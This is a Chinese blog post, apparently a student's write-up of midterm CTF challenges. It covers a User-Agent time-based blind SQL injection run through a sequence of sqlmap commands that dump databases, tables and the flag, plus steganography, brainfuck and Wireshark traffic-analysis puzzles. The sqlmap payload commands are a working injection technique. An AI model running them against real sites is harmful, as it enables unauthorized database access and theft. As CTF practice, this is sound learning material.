期中考核复现

最新推荐文章于 2024-09-14 21:53:48 发布
最新推荐文章于 2024-09-14 21:53:48 发布
阅读量383 收藏 7
点赞数 3
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74020633/article/details/139003654
版权

web

 简简单单的sql

需要寻找SQL,考核的时候dirsearch扫描到了login.php

是个登录框,进行了爆破尝试,密码用admin,尝试在用户名出进行注入点的判断

但是回显 NO SQL,一开始我以为是盲注,结果确实是盲注,只是不在这个页面

已经明确是SQL的话,利用sqlmap来扫描一下,发现常规扫描没有发现,再结合登录页面,说明要在登录的后的页面进行注入,输入用户名和密码进行抓包

下载POST传参的信息,利用sqlmap进行扫描,要设置测试的等级(测试等级到3就够用,要到5也没意见)前面对于sqlmap的了解不多,用这题也可以好好学习一下

sqlmap -r xxxxx --level 3

通过扫描知道注入类型和payload(前面扫描出来都不知道怎么利用)

在UA头扫描发现的,所以在UA头处进行时间盲注,指定UA头

sqlmap -r /home/kali/桌面/1.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" --dbs

爆出所有数据库

爆现在所处的数据库

sqlmap -r /home/kali/桌面/1.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" --current-db

爆表

sqlmap -r /home/kali/桌面/1.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" -D challenges --tables

 存在两张表,需要一张一张看

在第一张表里,爆字段

sqlmap -r /home/kali/桌面/1.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" -D challenges -T user_agents --columns

长度为40的字段就是flag

查询字段内容

sqlmap -r /home/kali/桌面/1.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" -D challenges -T user_agents -C user_agent --dump

拿到flag

Misc

Xjpg

下载附件,题目提示为f5,猜测f5隐写

 用F5-steganography进行解密

打开output.txt查看

乱码,用010editor打开

pk头,把文件改为zip,解压后查看文本

brainfuck解码

流量分析1 

下载附件,用wireshark进行分析

导出http对象,发现666.zip

给了很多文件

关于png的头部为:89 50 4E 47

尾部为:AE 42 60 82

查看6个文件,发现1.txt和6.txt分别为头部和尾部,说明6个txt为一张png

把16进制导入010中,另存为png图片,得到二维码

扫描二维码得到flag

流量分析3

下载得到rar文件,重命名一下,解压

flag应该在flag.docx文件中, 但是有加密

流量分析是key,那么流量分析拿密钥

看见usb,应该是键鼠流量分析

the key is qazwsxedcrfv

解密flag.docx

流量分析2

下载附件,用wireshark打开,是sql盲注的流量分析

过滤包含flag的http

根据盲注是一个一个字符去尝试,当从(1,1)到(2,1)时,说明第一个字符正确

102对照ACill表 是f,依次对照

flag为flag{skysql_is_very_cool!233}

MissAnYou
关注
从苏宁电器到卡巴斯基(第二部)第30篇:我当高校教师的这几年 VI
Gleam的专栏
01-31 4636
我在高校任教已经有几年的时间了,给我的感觉,教师的工作真的正应了“铁打的营盘流水的兵”这句话,以年为单位,每年其实都在重复着相同的工作,甚至可以精确到月、日,都已经是给我们安排好了的。比如几月开学,几月期中考试,几月期末考试,几月排课,几月交学期材料等等。而每年的工作除了正常的教学以外,不论是本科还是高职,教师还需要指导同学们的毕业设计,这项工作在同学们大学的学习过程中非常重要,关乎到大家是否可以如期毕业,是否可以为大学生活画上一个圆满的句号。
期中考核格式模板.ipynb
06-12
期中考核格式模板.ipynb
5.12期中考核复现
m0_73756016的博客
05-19 837
id的输入值应该为admin,但是admin必须进行url编码,由于浏览器会进行一次url解码,所以如果想要服务器端进行一次url解码,则必须对admin进行两次url编码。从标记的下面就是flag字符串的aci码。
期中考核复现~crypto
2401_82887816的博客
05-15 357
复制一小段搜索,发现是一种叫Unicode的编码方式对其进行Unicode解码Unicode是国际标准字符集,它将世界各种语言的每个字符定义一个唯一的编码,以满足跨语言、跨平台的文本信息转换Unicode 字符集的编码范围是, 可以容纳一百多万个字符, 每个字符都有一个独一无二的编码,也即每个字符都有一个二进制数值和它对应,这里的二进制数值也叫再拿去字符解码,得到一堆乱码再进行ASCII解码,得到如图再将得到的乱码进行base64解码,得到flag。
期中考核复现(web)
wwwwyyyrre的博客
10-19 446
ln是linux中一个非常重要命令,它的功能是为某一个文件在另外一个位置建立一个同步的链接.当我们需要在不同的目录,用到相同的文件时,我们不需要在每一个需要的目录下都放一个必须相同的文件,我们只要在某个固定的目录,放上该文件,然后在 其它的目录下用ln命令链接(link)它就可以,不必重复的占用磁盘空间。
云曦24期中考核复现(部分)
cyy001128的博客
05-19 909
搜索发现这句意思是进行一次URL解码,在网页上输入网址位置时也会进行一次URL解码,也就是进行两次,所以说url解码 + url解码 = admin,用bp对admin进行两次编码。可以从第二句if看出当id=admin时显示flag,再看前面会发现二者直接相等时会输出not allowed并退出。发现有一个md5绕过,下面要求c=d,并且可以读取flag.php。修改content-type,再次重放发现上传成功。先连接,然后用ls /查看,最后cat得到flag。打开发现已知n,c,e,求m。
春季学期期中考核复现——Ping
LOVEQHX的博客
05-16 70
一·Ping
2023.10.20期中考核复现(misc)
wwwwyyyrre的博客
10-20 165
杂项题就是2023陇剑杯的题目,可能还是不感兴趣吧,自从打完蓝帽杯之后除了web以外什么都没看。
期中考核部分复现
2301_81105268的博客
05-21 891
下载解压,打开附件搜索查找编码类型Unicode编码使用在线工具进行解码使用cyberchef进行解码得到flag下载解压打开附件e= 59159m=???根据题目信息,已知n,e,c,求解m使用在线工具分解大整数n得到三个质数编写脚本进行解题运行得到flag。
【研一周小结】第二周个人学习总结
Hide_in_Code
03-07 490
第二周学习总结(Markdown初体验) SIST Yippee 0 引言 ​ 本周各科逐步进入课程授课内容,有些课程开始布置课堂作业,但总体还处于起步的慢节奏阶段,给我们留有一些换课以及补漏的调整时机。 ​ 我个人本周逐步确定了大体上的选课意向,有部分课程还在纠结;同时,在时间允许的情况下我也继续去旁听了其他课程进行学习补充。 1 数字集成电路【旁听】 ​ 本周与上周的数集主要介绍了几种晶体管的基础原理与电气结构。 考核情况: 4次Homework,4次labs,共占30%; 期中考试,占20%; F
操作系统期中考核之自选题目研究(Linux下signal通信)
01-28
期中考核中选择这个主题,意味着我们需要对信号的原理、使用方法以及在实际操作中的应用有深入理解。 首先,信号是操作系统向进程发送的一种异步事件通知。它可以在任何时候由内核发送给进程,用于告知进程发生了...
机器学习期中期末考核测试题.zip
01-10
1、该资源内项目代码经过严格调试,下载即用确保可以运行! 2、该资源适合计算机相关专业(如计科、人工智能、大数据、数学、电子信息等)正在做课程设计、期末大作业和毕设项目的学生...机器学习期中期末考核测试题.zip
C语言期中考试试题及答案-1.pdf
04-07
C语言期中考试试题及答案C语言期中考试试题及答案C语言期中考试试题及答案C语言期中考试试题及答案C语言期中考试试题及答案C语言期中考试试题及答案C语言期中考试试题及答案C语言期中考试试题及答案C语言期中考试...
七年级数学下册期中考试模拟题【北师大版】.doc
04-18
七年级数学下册期中考试模拟题【北师大版】
UEFI学习笔记(五):EDK II PCD的概念、类型、使用
qq_44189622的博客
09-11 829
如果在BIOS里面有一些模块是binary方式集成进来的而这些binary又需要用到PCD(用于Binary Release),那么这些Binary集成的要用到的PCD就必须要设置为。PCD的值存在memory里面,下次启动时,上次更改的值丢失了,每次启动都是从default值开始。是存在VPD空间的(在FLASH上,只读),一般是出厂配置。如果platform是从源码build出来的,没有binary在里面的时候,PCD用的都是。作用域在一个模块中(模块级的),可以在Binary Level进行修改。
计算几何学习
网安小白
09-12 436
学习计算几何过程中对经典算法的记录
看Threejs好玩示例,学习创新与技术(二)
最新发布
htsitr2的专栏
09-14 343
它的主要特点是确保生成的点之间保持一定的最小距离,从而避免点的聚集。这种方法在计算机图形学、游戏开发、物理模拟等领域中非常有用,尤其是在需要生成自然分布的对象(如树木、石头等)时。如果不进行裁剪,那么效果如下(初步的锯齿感是因为矩形内采样的结果)。为啥这么复杂呢,为啥不开始存储每个方块的UV呢?下面代码的vTexCoords(=savedModelMatrix,已修改)记录方块所在的位置,vWorldPosition表示方块中像素的偏移。在上面那副图中,聪明的你一定初步猜到了每个方块的纹理是怎么得到的。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-11 909
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络通信技术期中测试重点解析
"网络通信技术期中测试及详解(ppt格式)" 网络通信技术是通信与网络领域的基础知识,涵盖了许多核心概念。以下是测试中的部分知识点详解: 1. 数据通信系统模型由五部分组成:信源(产生数据的设备),发送器(将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值